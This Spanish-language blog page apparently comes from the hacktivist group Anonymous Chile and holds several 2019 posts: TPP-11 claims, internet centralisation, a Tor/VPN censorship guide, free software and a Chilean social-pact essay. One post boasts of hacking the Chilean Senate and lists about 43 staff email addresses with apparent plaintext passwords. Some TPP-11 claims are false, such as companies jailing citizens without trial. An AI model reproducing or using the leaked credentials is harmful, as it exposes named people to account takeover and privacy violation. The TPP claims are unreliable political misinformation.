  7. Las empresas alimenticias y distribuidoras de alimentos, farmacéuticas manufactureras de medicamentos y corporaciones productoras y vendedoras de semillas de cultivos agrícolas podrían fijar y establecer sus propios precios independiente de las leyes de cada país y si éste o algún/a ciudadanx intenta imponerse pueden demandarle, aplicarle sanciones arbitrarias determinadas por la entidad afectada y enviarlo a prisión sin ninguna clase de juicio previo ya que se modifica la constitución de las naciones beligerantes en pro de defender, custodiar y proteger los intereses, bienes y propiedades de cada empresa o corporación privada.
  8. Pero por sobre todo lo anterior, el total de los contenidos exactos del TPP-11 son secretos hasta 4 años después de haberlo firmado.

¿Suena ridículo? ¿Por qué creen que hay tantas protestas en otros países y la prensa no reporta casi nada? Gracias políticos, por vender Chile de nuevo. Acaban de hacer que las pocas leyes que teníamos terminen de valer hongo, que la gente que no tiene dinero suficiente para pagar sus medicamentos se muera, que los demás sean contaminados por químicos en semillas y alimentos y que empresas multinacionales abusen y nos aplasten como quieren a toda el pueblo de Chile

¿Entiendes ahora por qué nuestra campaña contra el TPP-11? Apóyanos, infórmate, involúcrate, participa, súmate y no te quedes atrás en la lucha por defender tus derechos. No dejemos que nuestro país termine siendo gobernado por una elite conformada por empresas multinacionales.

Recuerda: TPP = Todos Podemos Perder.

66 comentarios

Centralización y monopolización del Internet

Publicada el 26/11/2019 - 30/11/2019 por Anonymous Chile

La web fue diseñada para ser descentralizada. Aún cuando sus desarrollos iniciales fueron financiados por el aparato bélico del gobierno estadounidense, lxs académicxs y científicxs de las universidades que se encargaron de su diseño durante los años 60 y 70 suscribieron la idea de que una red de telecomunicaciones descentralizada, en la que cada nodo tendría autonomía para dirigir sus comunicaciones con un protocolo común, sería la solución más robusta.

Comunidades en lugar de corporaciones

El cambio radical de Internet frente a medios centralizados, aquellos que tienen una autoridad que decide qué será visto y qué no (como empresas, periódicos, partidos políticos, televisoras privadas, etc.) es la posibilidad de participar, establecer debates y una nueva forma de colaborar en años recientes.

La neutralidad de la red es una característica esencial e histórica de Internet; es la capacidad de acceder, desde todos y cualquier punto de la red a todos los contenidos publicados y también de participar en igualdad de condiciones. Es un principio que ha hecho de Internet un importante medio para la libertad de expresión. Y en estos momentos está en peligro esta forma de funcionar, más allá de la abrumadora presencia del capitalismo corporativo, algunos gobiernos están proponiendo leyes que atentan contra las libertades, la igualdad de oportunidades, la horizontalidad y procuran la censura, la discriminación, el control y la represión.

También es importante la descentralización de nuestras comunicaciones y usos de Internet. Los grandes servicios monopólicos como Google, Facebook y Microsoft centralizan nuestras comunicaciones y lucran con nuestros datos personales. Tienen el control de la distribución y concentración de nodos de la red debido a su gran poder económico. Esta centralización facilita la vigilancia sobre nuestras comunicaciones y la invasión de nuestra privacidad.

La mejor forma de apoyar la descentralización de la red es aprender más sobre software libre y administración de nuestros propios servicios de Internet.

Los movimientos sociales necesitamos el apoyo de más personas familiarizadas con estas tareas. Una alternativa es utilizar servicios de Internet gestionados en servidores seguros y administrados por colectivos y organizaciones comprometidos a defender los derechos de sus usuarixs.

56 comentarios

Anonymous Chile ataca al Senado, la cámara alta del Congreso Nacional

Publicada el 20/11/2019 por Anonymous Chile

En esta ocasión, Anonymous Chile ha perpetrado un ciberataque contra el Senado de la República, la cámara alta del Congreso Nacional, en protesta contra la alta dieta parlamentaria de la que gozan los congresistas, obteniendo una extracción de numerosos correos y contraseñas de varios trabajadorxs de la mencionada institucion en disputa.

iauger@senado.cl 12071967
ggl@senado.cl 24012401
ggl@senado.cl GUICHO1711
gmiranda@senado.cl 123456
abarrera@senado.cl ab4063
abarrera@senado.cl romeo
acarballal@senado.cl 863590
almacen@senado.cl gang15
lvargas@senado.cl s3nad0
lrodriguez@senado.cl francisca
siturrieta@senado.cl 140397
bgalleguilos@senado.cl turok60
ominami@senado.cl elydo3
mfernandez@senado.cl 3sxbp
xmgonzalez@senado.cl xim2401
eflores@senado.cl nihf2612
evalencia@senado.cl 001994
eveliz@senado.cl 120819
eramirez@senado.cl 195788
epalma@senado.cl 201077
ddupuy@senado.cl 1948dupuy
hcofre@senado.cl betsie
clinisen@senado.cl car1458
ccarrion@senado.cl 2072qwe
calvarado@senado.cl 061013
candrade@senado.cl 2504153
cantero@senado.cl 561111
chadwreg@senado.cl 4404ac
rcatalan@senado.cl cristina
rcatalan@senado.cl paty81
rrppsen@senado.cl sarisol1411
rpoblete@senado.cl kitaro
palvarez@senado.cl pac,8762
pfuenzalida@senado.cl sanscrito
pvergara@senado.cl sys
pvergara@senado.cl sys,adm
prensacantero@senado.cl cantero195
protocolostgo@senado.cl sscc12
ppadilla@senado.cl caprina
jmunoz@senado.cl 123456
jtobar@senado.cl trufita
jaramill@senado.cl virgen6
jaranda@senado.cl jaranda

Nosotrxs somos hacktivistas y ciberactivistas pertenencientes a los colectivos de Anonymous y Anonymiss de Chile

No perdonamos las injusticias, abusos de la clase burguesa contra el E° de Chile, el control que el gobierno lleva a cabo contra el pueblo y la manipulación de información por parte de los medios.

No olvidamos la represión indiscriminada y desmedida que las autoridades y fuerzas de la ley ejercen sobre ciudadanos inocentes y personas desarmadas que luchan y se manifiestan pacíficamente por un país más igualitario, equitativo y digno para todxs.

Esperen, que vamos por ustedes, vamos a expresar nuestro descontento por los recientes acontecimientos en nuestro país, vamos a alzar la voz por la de millones de oprimidxs y vamos a apoyar la lucha del pueblo chileno en defensa de su libertad, sus derechos y su dignidad como personas pobladorxs de esta tierra.

49 comentarios

Permanecer anónimo y eludir la censura en Internet

Publicada el 18/11/2019 por Anonymous Chile

Muchos países tienen infraestructuras que impiden que los usuarios de Internet accedan a determinados sitios web y servicios en línea dentro de esos países. A menudo empresas, colegios, bibliotecas y otras instituciones cuentan con técnicas similares para «proteger» a sus trabajadores, estudiantes y clientes de material que consideran dañino o que distrae la atención. Esta tecnología de filtración viene en muchas formas diferentes. Algunos filtros bloquean sitios según sus direcciones IP, mientras que otros ponen en una lista negra nombres de dominio particulares. A su vez, algunos bloquean todos los servicios hasta que se agregan a una lista blanca oficial, mientras que otros buscan por todo el tráfico no cifrado y dejan de lado solicitudes que incluyen palabras claves específicas.

A menudo puedes eludir estos filtros con software que dependen de servidores intermediarios, ubicados en otros países para transmitir contenido entre tu dispositivo y los servicios bloqueados a los que tratas de alcanzar. A este proceso se le suele llamar elusión de censura, o simplemente elusión. Como también a esas computadoras intermediarias se les suele llamar proxys, las cuales vienen en muchas formas diferentes.

Esta guía incluye una breve introducción a la red de anonimato del Enrutador Cebolla y una descripción más detallada de proxys de elusión básicos, que incluyen Redes Privadas Virtuales (VPN). Ambas técnicas tienen ventajas y desventajas. El Enrutador Cebolla es una buena opción si funciona en tu país, si su uso no está penalizado y si estás dispuesto a sacrificar velocidad para mantener anónima tu actividad en línea. De otra forma, un VPN — u otro proxy cifrado de elusión — te puede servir mejor, en tanto confíes en la persona u organización que opera el servicio.

Entender la censura en Internet

Investigaciones llevadas a cabo por organizaciones como Open Observatory of Network Interference (OONI) y Reporteros sin Fronteras (RSF) indican que muchos países filtran una gran variedad de contenido social, político y de ‘seguridad nacional’, mientras que casi nunca publican listas precisas de lo que bloquean. Naturalmente, los que quieren controlar el acceso de sus ciudadanos a Internet también hacen un esfuerzo especial para bloquear proxys y sitios web conocidos que ofrecen herramientas e instrucciones para ayudar a eludir estos filtros.

A pesar de la garantía de libre acceso a la información consagrada en el artículo 19 de la Declaración Universal de Derechos Humanos, la cantidad de países que ejercen censura en Internet sigue aumentando. Sin embargo, así como esta práctica se esparce por todo el mundo, lo mismo ocurre con las herramientas de elusión que activistas, programadores y voluntarios han creado, desplegado y publicitado.

Antes de explorar las diversas maneras de eludir la censura en Internet, primero debes tener un conocimiento básico de cómo funcionan esos filtros. En el proceso, puede ser útil evaluar un modelo simplificado de tu conexión a Internet.

Tu conexión a Internet

Cuando solicitas una página web o interactúas con otro servicio en línea, tu dispositivo usa la conexión de datos cableada, inalámbrica o datos móviles para llegar a tu Proveedor de Servicio de Internet. Si estás en casa, probablemente sea una empresa a la que pagues todos los meses. Si usas datos móviles, es probable que sea el proveedor de servicios móviles. Sin embargo, si estás trabajando en una oficina, colegio, cybercafé u otro espacio público, puede ser difícil determinar quién es tu proveedor de servicio de Internet.

Sea quien sea, tu proveedor de servicio de Internet tendrá asignada una dirección IP externa a tu red. Los servicios en línea pueden usar esta dirección para enviar tus datos, como los correos electrónicos que recibes y las páginas web que solicitas (tu dispositivo tendrá una dirección IP interna también — así es como tu enrutador trata de asegurar que todos en tu red reciban su propio tráfico — pero éste no se usa al conectarse a Internet).

Todo aquel que sepa tu dirección IP puede averiguar en qué ciudad o región estás, pero algunas instituciones pueden determinar tu ubicación exacta:

  • Tu proveedor de servicio de Internet probablemente sabrá en qué edificio estás. A menos que estés usando datos móviles, en cuyo caso tu proveedor de servicio ya sabe tu ubicación física precisa.
  • Tu ciber café, biblioteca o negocio sabrá cuál de sus computadoras usaste en un momento determinado. Asimismo, si usaste tu propio dispositivo, sabrán qué puerto o punto de acceso inalámbrico utilizaste.
  • Las agencias gubernamentales tal vez sepan todo lo anterior. Y aunque no lo supieran, pueden usar su influencia para averiguarlo.

Tu proveedor de servicio de Internet depende de la infraestructura de red en tu país para conectar a sus usuarios con el resto del mundo. Y, en el otro lado de esa conexión, el sitio web o servicio de Internet al que accedas pasará por un proceso similar, tras haber recibido sus propias direcciones IP de un proveedor de servicio de Internet en su país.

La comunicación por Internet es un poco más complicada de lo que podría sugerir la descripción anterior, pero hasta un modelo tan simplificado puede demostrar ser útil al evaluar herramientas de anonimato y elusión.

Cómo se bloquean los sitios web

Cuando ves una página web, tu dispositivo usa el Servicio de Nombre de Dominio (DNS) para buscar la dirección IP (algo como 209.51.188.174) asociada con el nombre de dominio del sitio (www.fsf.org). En este ejemplo, le pedirá a tu proveedor de servicio de Internet que envíe una solicitud a través del proveedor de servicios de Internet a cargo de 209.51.188.174. Si llegas hasta ahí, tu dispositivo pedirá luego al servidor web de 209.51.188.174 el contenido de www.fsf.org.

Sin embargo, si estás en un país que censura securityinabox.org, tu solicitud quedará descartada o se desviará en algún punto de ese proceso. Esto puede ocurrir cuando tratas de buscar las direcciones IP, cuando solicitas el contenido o mientras el contenido se envía a tu dispositivo. En algunos países, a los proveedores de servicio de Internet se les pide que manejen esto directamente con una consulta a una lista negra nacional o elaborando una propia. Otros países dependen del filtro de infraestructura que vigila todas las solicitudes desde dentro del país y las compara con una lista negra centralizada. Estas listas pueden contener nombres de dominio, direcciones IP o las dos cosas.

En algunos países, el software de filtro examina tu tráfico no cifrado de Internet para ver las palabras claves en la lista negra, incluso si esas palabras claves no son parte de la dirección del sitio web. Los softwares como éste pueden examinar las páginas que te retornen y las solicitudes que hagas.

Finalmente, tal vez no siempre sepas cuándo has solicitado una página web bloqueada. Algunas herramientas de filtro muestran un mensaje que explica por qué una página en particular ha sido censurada mientras que otras muestran engañosos mensajes de error. Por ejemplo, se puede insinuar que no se encuentra la página o que la dirección está mal escrita.

Toda técnica de filtro tiene sus propias fortalezas y debilidades. Sin embargo, al intentar eludir la censura en línea, a menudo es más fácil asumir lo peor que averiguar qué técnicas se usan en tu país. En otras palabras, también podrías asumir:

  • Que el filtro se implementa a nivel nacional, a nivel del proveedor de servicio de Internet y a tu red local.
  • Que las búsquedas del Servicio de Nombre de Dominio y las solicitudes de contenido están bloqueadas.
  • Que hay listas negras para nombres de dominio y direcciones IP.
  • Que tu tráfico no cifrado de Internet está vigilado para palabras claves.
  • Que te darán una razón engañosa cuando un sitio bloqueado no logre cargarse.

Las herramientas más seguras y más efectivas de elusión deberían funcionar de todas maneras.

Entender la elusión de censura

Hay muchas razones por las que podrías no ver una página web o comunicarte con otro recurso en línea. Si la causa es la censura de Internet, es porque en algún lugar un dispositivo entre ese recurso y tú, probablemente ha decidido ignorar tu solicitud. Normalmente, dependemos de metáforas físicas como elusión y desvío para describir cómo sorteamos esos obstáculos. Lamentablemente, para llegar a tu destino sin enviar tráfico a través de la infraestructura de filtros de tu país deberías construir tu propia Internet (o tal vez usar una red satelital, pero vienen con su propio grupo de riesgos).

En realidad, las herramientas de elusión funcionan asegurándose de que el destino de cada solicitud esté cifrado hasta que llegue a un servidor proxy en otro país. Ese proxy cifra, envía la solicitud, acepta la respuesta, la cifra y la envía de nuevo a tu dispositivo. Quizás un túnel es una mejor metáfora. En teoría, tu tráfico sigue pasando a través de la infraestructura de bloqueo de tu país, pero los filtros no lo pueden leer ni determinar a dónde va después de que sale del túnel. Todo lo que saben es que estás interactuando con una computadora desconocida en algún lugar de Internet.

Resistencia de bloqueo

Por supuesto, la agencia gubernamental a cargo de la censura de Internet en tu país — o la empresa que brinda actualizaciones para su software de filtrado — algún día puede identificar esa computadora desconocida como un proxy de elusión. Si eso ocurre, la propia dirección IP del proxy puede agregarse a la lista negra, con lo que se vuelve tan inalcanzable como el contenido que usabas para acceder al proxy.

Sin embargo, toma tiempo para que los proxys queden bloqueados así, y los que conservan herramientas de elusión normalmente se defienden con una o más de las siguientes técnicas:

  • Proxys ocultos pueden ser distribuidos a nuevos usuarios, impidiendo que la censura sepa de todos a la vez.
  • Proxys descartables se pueden reemplazar más rápidamente de lo que se les puede bloquear.
  • Frente al dominio es una manera de asegurarse de que el proxy no se pueda bloquear sin también bloquear el acceso a otros servicios populares (por lo general, Google o redes sociales).
  • El obscurecimiento lo usan algunas herramientas de código cerrado que tratan de impedir que los censores averigüen cómo funcionan.

La red de anonimato del Enrutador Cebolla

El Enrutador Cebolla es la red pública de anonimato más conocida y más minuciosamente probada. Funciona casi como una VPN, salvo que cada vez que la usas, tu dispositivo elige tres proxys — más o menos al azar — y transmite el tráfico por los tres. A esos proxys se les llama relés o repetidores del Enrutador Cebolla. Los manejan voluntarios, y hay varios miles de voluntarios. Al agregar una capa separada de cifrado para cada relé, el Enrutador Cebolla te asegura que ni tu proveedor de servicio de Internet ni los propios relés pueden determinar la dirección IP de tu dispositivo ni tampoco la ubicación de los sitios web que estás visitando.

Aunque el navegador del Enrutador Cebolla es más lento que la mayoría de las herramientas de elusión, tiene algunas características únicas. En primer lugar, evita que te preocupes si puedes o no confiar en las personas y organizaciones que operan los proxys que utilizas. En segundo lugar, hace un trabajo mucho mejor de evitar que los sitios web que visitas averigüen quién eres. En teoría, esas son características de privacidad, no características de elusión, pero son importantes para muchas personas que se ven obligadas a enfrentar filtros en línea.

Usar el Enrutador Cebolla no es oculto ni privado, puede ser detectado por terceros. Usarlo te puede poner en riesgo, aunque nadie pueda saber para qué lo usas. Además, debes asegurarte de tener una conexión (HTTPS) segura al sitio web que estás visitando antes de enviar o recibir información delicada.

Herramientas de elusión básicas

Si el navegador del Enrutador Cebolla no funciona en tu país, si usarlo te pondría en riesgo o si es demasiado lento para tus necesidades, tal vez necesites encontrar otra opción.

Red privada virtual (VPN)

En algunos países, basta con inscribirse en un servicio de VPN gratis o comercial manejado por una persona, organización o empresa en la que confíes. Algunos servicios de VPN dependen de la funcionalidad incorporada en los sistemas operativos de Windows, Mac, GNU/linux, Android e iOS. Mientras que otros requieren que instales y configures el software OpenVPN. En algunos casos, tu proveedor te dará un instalador personalizado que maneja todo.

El único problema con este enfoque es que las VPN básicas casi no tienen características de resistencia al bloqueo incorporadas, como se describe anteriormente. Como resultado, cuando tu servicio VPN queda bloqueado, debes encontrar uno nuevo.

A continuación, hay dos opciones de VPN seguras, privadas y sin costo de Riseup Collective.

Herramientas proxy específicas para elusión

Si trabajas en un país que bloquea agresivamente los puentes del Enrutador Cebolla y los servicios de VPN, tal vez debas usar un software que esté perfeccionado para la resistencia de bloqueo. Diferentes herramientas intentan resolver este problema de maneras diferentes, pero siempre debes tener en cuenta estas preguntas antes de elegir:

  • ¿Es segura esta herramienta? ¿Puedes confiar en las personas que la operan? Recomendamos enfáticamente usar herramientas que cifren la conexión entre tu dispositivo y tu proxy. Si te quedas con un software de fuente abierta, probablemente encuentres expertos que hayan evaluado este aspecto de las herramientas que estás considerando usar. Finalmente, recuerda que el cifrado no hace nada para evitar que un administrador inescrupuloso tenga una lista completa de los sitios web que visitas a través de su servicio (la única manera de evitar este riesgo en particular es usar el navegador del Enrutador Cebolla).
  • ¿Es un proxy en línea o software independiente que se debe instalar? Un proxy en línea es solamente una página web con una barra de direcciones incorporada que funciona como un navegador dentro de un navegador. Los proxys en línea pueden ser convenientes, a veces — como cuando no puedes instalar software o si al instalarlo te pones en riesgo — pero las herramientas de elusión independientes, de buena reputación, son más seguras y más confiables. Nunca debes usar un proxy en línea a través de una conexión insegura (HTTP). Y debes evitar ingresar contraseñas o intercambiar información delicada a través de un proxy en línea, aunque admita HTTPS.
  • ¿Es público o privado? Los proxys públicos los puede usar cualquiera, sin costo, pero tienden a congestionarse más rápido. Esto les reduce la velocidad y aumenta la probabilidad de que los bloqueen. Los proxys privados limitan el acceso de alguna manera, a menudo con un cobro mensual o anual. Si puedes tener una cuenta en un proxy confiable, seguro y privado, probablemente siga funcionando más tiempo que un proxy público. Hasta el navegador del Enrutador Cebolla, que es público, a veces pide que los usuarios adquieran nuevos relés de puentes.

Lectura adicional

  • La guía Cómo eludir censura en línea de Surveillance Self Defense (SSD) de Electronic Frontier Foundation (EFF).
  • Open Observatory of Network Interference (OONI) recopila datos sobre censura de Internet alrededor del mundo.
43 comentarios

Software libre como forma de lucha y resistencia contra el mercado de datos y el monopolio de la privacidad

Publicada el 17/11/2019 - 17/11/2019 por Anonymous Chile

En palabras de Richard Stallman, «software libre quiere decir software que respeta la libertad del usuario y la solidaridad social de su comunidad». En el libro «1984» de George Orwell, su autor concibió la elaboración de software de manera cooperativa, de tal forma que quien lo utilizara con posterioridad pudiera copiarlo, modificarlo y distribuirlo libremente, atendiendo a sus necesidades particulares.

Utilizar software libre no es la panacea pero puede brindarnos mayor seguridad y protección contra la vigilancia electrónica debido a su esquema comunitario de desarrollo. El hecho de que el código fuente de los programas de software libre pueda ser auditado permite que una comunidad de hackers e informáticos pueda identificar fallas en su seguridad y contribuir a mejorarlo.

¡Software libre para una sociedad libre!

Software libre no significa software gratis, aunque en la práctica suele ser gratuito. Lo «libre» de este software se refiere a la libertad que tenemos para participar en su desarrollo, modificación y distribución.

El software privativo es aquel que se prohíbe usar sin pagar licencia. Utilizar piratería no es un acto de desobediencia económica que perjudique a las corporaciones de software. Aun cuando no paguemos una licencia, usar software comercial y privativo fortalece el poder monopólico que estas empresas tienen en el mercado, haciendo más difícil que el software libre pueda enfrentar esta amenaza. Dado que no podemos auditar su código fuente, el software privativo nos expone a mayores riesgos de seguridad y además significa ceder la soberanía de nuestras máquinas y nuestros datos. En diferentes ocasiones grupos hackers han descubierto que las empresas creadoras de sistemas operativos privativos como Windows de Microsoft o iOS de Apple, intencionalmente introdujeron programas espías o backdoors (puertas traseras) en su software.

Por la comunidad y para la comunidad

El software libre no es más difícil de usar que el software privativo. En los últimos años las distribuciones de GNU/Linux y diversas aplicaciones de software libre son cada vez más amigables. Todo lo que es nuevo o diferente nos puede intimidar pero con el uso y la práctica perdemos el miedo.

¡Y no estamos solxs! Alrededor del software libre existe una cultura de cooperación y conocimiento compartidos. Hay cientos de foros y páginas web donde de manera desinteresada muchas personas publican tutoriales o ayudan a gente que tiene preguntas.

Una forma de iniciar y seguir avanzando en la adopción de software libre es buscar y participar en comunidades de apoyo interesadas en el tema.

Nosotrxs recomendamos utilizar el sistema operativo GNU/Linux vía una distribución que pueda funcionar sin software privativo y sea desarrollada por una comunidad.

162 comentarios

Hacia el necesario Pacto Social entre trabajadores, empresarios y Estado por un nuevo modelo de desarrollo y bienestar

Publicada el 17/11/2019 - 17/11/2019 por Anonymous Chile

El acuerdo constitucional es un enorme paso adelante. Los autores del presente texto llaman, sin embargo, a no olvidar que llegamos a este punto empujados por el rechazo a “la violenta normalidad” previa al 18/O. Estiman imprescindible avanzar hacia a un pacto social entre trabajadores, empresarios y Estado que genere “un nuevo modelo de desarrollo y bienestar para Chile”, sin el cual “seguirán muy activas las razones del odio que nos han traído hasta aquí”.

El acuerdo para una reforma a la Constitución alcanzado anoche es histórico y despeja uno de los frentes de conflicto que se abrieron luego del estallido del 18/O.

Hay frentes abiertos aún, por ejemplo, la imprescindible reforma de las fuerzas de orden y seguridad; y a la investigación exhaustiva sobre sus abusos y los casos de violación de DDHH en la represión de la protesta.

No obstante, aquí nos interesa centrarnos en un tercer frente. Casi sin darnos cuenta, hace ya unos cuantos días dejamos de hablar del abuso y de la dignidad de nuestro modelo económico-social (obviamente, las violaciones de los DDHH por parte de las fuerzas de orden han sido la excepción a este respecto).

En su lugar, nos enfrascamos en sesudas disquisiciones, negociaciones y cabildeos sobre el imprescindible proceso de reforma constitucional. Y está muy bien. Sin embargo, ahora es imprescindible volver sobre aquella otra causa fundamental detrás del estallido: la demanda por un nuevo trato, por la construcción de una sociedad más digna y más justa. Por un nuevo modelo de desarrollo y bienestar para Chile.

“Si el pacto social que necesitamos no es meramente un paquete de políticas públicas, ¿qué es? Es un mecanismo de negociación institucionalizado, a partir del cual actores sociales clave para la economía (como los empresarios, los sindicatos y el Estado) negocian y acuerdan parámetros esenciales que condicionan su actividad, en el marco de un modelo de desarrollo que constituye una política de Estado”.

Dicha construcción necesita no solo de un debate constitucional, sino también, de la negociación de un pacto social. Esto es, de un acuerdo entre empresarios, trabajadores y el Estado respecto al modelo de producción y protección social que requiere el país. Sin ese otro pacto, el camino hacia un nuevo orden democrático y hacia la paz social será muy difícil.

El pacto social es imprescindible por al menos tres razones.

Primero, constituye la única alternativa posible para recobrar la seguridad jurídica que requiere la inversión económica. No se crece en ausencia de un ambiente institucional con reglas creíbles y socialmente legítimas. Chile creció en estas últimas décadas a tasas admirables, pero lo hizo minando, hoy lo sabemos, los cimientos sociales e institucionales de su economía. Y por eso, desde hace cuatro semanas vivimos en otro país. Uno cuyo riesgo de inversión ha aumentado radicalmente en las últimas semanas a raíz del potencial de conflicto social agudo.

En otras palabras, si no se resuelven las tensiones sociales estructurales, Chile podría sufrir nuevos ciclos de polarización y estallido social. La razón es bien simple: seguirán muy activas (y se acumularán) las razones del odio, rabia, y enojo que nos han traído hasta aquí. El riesgo entonces es vivir un largo período de inestabilidad con espasmos de violencia intensa, porque durante las últimas semanas, finalmente se politizó la desigualdad haciendo que aumente el nivel de conflicto por la distribución de los recursos.

“Para comenzar a discutir este pacto se podría, por ejemplo, convocar a la Unidad Social, que poco a poco se ha ido consolidando como el agente organizado de las demandas más importantes de la sociedad”.

La sociedad civil cuenta hoy con repertorios de protesta y contestación del status-quo, en las calles, que han probado ser sumamente efectivos para presionar por cambios. Ha quedado demostrado cómo hoy es posible, aún con un entramado organizacional débil, paralizar al país, movilizar cientos de miles de personas y generar costos tangibles al capital y a la política institucional. A raíz de esta nueva capacidad adquirida por la sociedad civil, el gobierno que prometía retornar al crecimiento económico terminará seguramente con una crisis profunda y con la salida masiva de capitales e inversión de la economía.

Al fin y al cabo, los costos sociales y económicos de lo que no se construyó en estos largos años son ahora tangibles para los ganadores del modelo que hoy se sienten vulnerables. Tal vez hoy parezca un poco más razonable el viejo argumento de Karl Polanyi, según quien no hay mercado que no dependa, en definitiva, de soportes institucionales socialmente legítimos. Como sugiere la columna de Sergio Toro y Macarena Valenzuela (“Sobre la violenta normalidad a la que los chilenos no quieren volver“), al exponer la fragilidad de dichos soportes en el caso de Chile, la crisis democratizó la vulnerabilidad. Hoy los “winners” del modelo experimentan un poco la zozobra permanente que experimentan en sus vidas aquellos a quienes habían ignorado, confiando en el “chorreo” y en una visión parcial y sesgada respecto a las bondades de nuestra muy bien segregada “modernización capitalista”.

En segundo lugar, el pacto social resulta imprescindible para asegurar la estabilidad del carácter democrático de un nuevo orden. No hay democracia liberal sustentable en el largo plazo sin un modelo de desarrollo que garantice mínimos sociales legítimos para la ciudadanía. Por tanto, el frente constitucional requiere de un pacto social que lo acompañe y le dé “sustento”.

Finalmente, el pacto social es necesario porque Chile requiere discutir, consensuar, y encontrar soportes institucionalmente socialmente arraigados para un nuevo modelo de crecimiento. El desafío es encontrar un modelo que combine crecimiento económico sostenible con mejoras significativas en la redistribución de las rentas de dicho crecimiento (balanceado los beneficios obtenidos por empresarios y trabajadores).

“Un nuevo pacto social no solo necesita de un debate constitucional, sino también de un acuerdo entre empresarios, trabajadores y el Estado respecto al modelo de producción y protección social que requiere el país. Sin ese otro pacto, el camino hacia un nuevo orden democrático y hacia la paz social será muy difícil”.

El nuevo modelo de desarrollo debe también integrar parámetros claves de la economía política emergente, como lo son la sustentabilidad ambiental, los posibles efectos de la robotización en la destrucción masiva de empleos, y el desafío de evitar una reprimarización de nuestras economías dadas las crecientes brechas tecnológicas que se están configurando entre países de alto desarrollo y los países como Chile.

El pacto al que nos referimos no es un conjunto de medidas económicas y sociales como el que el gobierno ha comenzado a implementar, en base al esfuerzo fiscal y a una reforma progresiva en la estructura impositiva. Seguramente, en los próximos meses veremos crecer la inversión pública para intentar dinamizar la economía y atender, al mismo tiempo, a los temas sociales más urgentes. Chile tiene, por su pasado de austeridad, instrumentos disponibles para sostener estas políticas de expansión de gasto por un tiempo. Pero el tiempo para esta estrategia típicamente Keynesiana es limitado. Y si ya no se podrá crecer en función de la competencia en base a una pequeña cartera de commodities, una reducida carga tributaria, un bajo costo laboral y la expansión del consumo y su financiación, es necesario encontrar otro modelo de crecimiento.

Si el pacto social que necesitamos no es meramente un paquete de políticas públicas, ¿qué es? Es un mecanismo de negociación institucionalizado, a partir del cual actores sociales clave para la economía (como los empresarios, los sindicatos y el Estado) negocian y acuerdan parámetros esenciales que condicionan su actividad, en el marco de un modelo de desarrollo que constituye una política de Estado.

Los pactos sociales son negociaciones de suma positiva y sus beneficios crecen en la medida que los actores desarrollan confianzas y establecen compromisos que alargan los horizontes temporales de cada uno. En países con tradición de negociación de pactos sociales, como los escandinavos, estos mecanismos de negociación se encuentran institucionalizados. Un desafío fundamental para lograrlo en el caso de Chile radica en la asimetría en la organización social de empresarios y trabajadores, dadas las bajas tasas de sindicalización y la alta fragmentación sindical que hoy posee Chile como resultado de las reglas que regulan la actividad sindical.

“El pacto social es imprescindible por al menos tres razones. Primero, constituye la única alternativa posible para recobrar la seguridad jurídica que requiere la inversión económica. No se crece en ausencia de un ambiente institucional con reglas creíbles y socialmente legítimas».

Mientras se discuten dichas reglas, lo relevante, por ahora, es que los actores clave para discutir qué tipo de estrategia de desarrollo es viable y deseable para el Chile de los próximos años, tengan un espacio para negociar, con tabla abierta, y con la posibilidad de ir incorporando progresivamente otros actores a la discusión de “un nuevo trato”.

Para comenzar a discutir este pacto se podría, por ejemplo, convocar a la Unidad Social, que poco a poco se ha ido consolidando como el agente organizado de las demandas más importantes de la sociedad. Son parte de la Unidad Social actores como la CUT, la Confech, el movimiento No + AFP, entre otros. Los empresarios, a través de sus organizaciones gremiales, y la Unidad Social deben encontrarse y sentar las bases de un nuevo modelo de desarrollo para Chile. Otros actores podrán irse incorporando a la mesa, que deberá discutir y negociar hasta que duela. Sin prisa, pero ojalá, sin pausa.

A la sombra de los últimos cuarenta años puede que parezca utópico pensar en la posibilidad de un proceso de concertación social centralizado para discutir el modelo de desarrollo de Chile y los parámetros básicos de relación entre capital y trabajo. No obstante, el estallido ha vuelto viable esta alternativa, tal como hizo posible abrir y cuajar un proceso constituyente cuyo desenlace actual era impensado hace una semana. Más aún, creemos que el gobierno propició la negociación de anoche (obviamente sin buscarlo), al generar una situación límite la noche del Martes 12 que nos dejó a todos, y muy particularmente a quienes negociaron la salida constitucional, muy asustados.

Aprovechar la oportunidad que abrió el estallido para la negociación de un pacto social es urgente, porque su viabilidad será menos probable cuanto más tiempo dejemos pasar. Y en esto último, la simetría con el proceso constituyente es solo relativa. Ante la hegemonía del tema constitucional, la oportunidad para fraguar un nuevo pacto social puede desvanecerse. Esto aplica tanto a escenarios en que el conflicto ceja en intensidad como resultado del anuncio del proceso constituyente, como a aquellos en que el conflicto social continúa abierto.

“Desde hace cuatro semanas vivimos en otro país. Uno cuyo riesgo de inversión ha aumentado radicalmente a raíz del potencial de conflicto social agudo”.

En un escenario optimista, donde se logra cierta tensa paz social a través de un anuncio contundente sobre el proceso constituyente, las élites económicas se sentirán menos amenazadas y perderán progresivamente el sentido de urgencia y la predisposición a dialogar “hasta que duela” (así expresó Swett, presidente de la CPC, el compromiso de las élites empresariales por discutir la contribución de los empresarios al desarrollo social del país). En ese sentido, en una economía abierta como la chilena, hay una diferencia fundamental entre la estructura de incentivos que poseen el capital y los políticos que asustados por la crisis del martes, finalmente decidieron negociar. El capital puede buscar otros horizontes, y fugarse del país. Los políticos negociaron, en parte, porque al igual que los trabajadores están anclados en Chile.

Mientras tanto, si las organizaciones sociales, los sindicatos, el movimiento social, ocupan su acción política casi por entero al proceso constituyente, los millones de chilenos que han marchado o protestado por su calidad de vida, por vivir de manera más digna, sentirán que una vez más han sido postergados porque no se abordaron con urgencia las múltiples demandas vinculadas a sus condiciones y calidad de vida. Si eso sucede, quedará sembrada la semilla de un nuevo estallido. Un efecto de largo plazo del estallido es que la sociedad exteriorizó y politizó, de manera intensa, su rabia contra la desigualdad y el abuso. Al hacerlo, reaprendió también, el poder de la movilización social y de la política para presionar por transformaciones. Dicho aprendizaje, así como los desafíos estructurales asociados a la búsqueda de una estrategia de desarrollo con equidad en un contexto mundial como el actual aumentan significativamente la probabilidad de que el conflicto recurra permanentemente. Pactar para abordar de frente esas condiciones estructurales, a partir de políticas concertadas y de suma positiva, parece ser la única opción.

64 comentarios

Vigilancia en teléfonos celulares

Publicada el 17/11/2019 - 17/11/2019 por Anonymous Chile

La tecnología celular mantiene un desarrollo completamente cerrado y controlado por grandes monopolios. Para hacer uso de las aplicaciones y sus actualizaciones estamos obligadxs a ingresar datos como nuestros correos electrónicos y ubicación, entre otros.

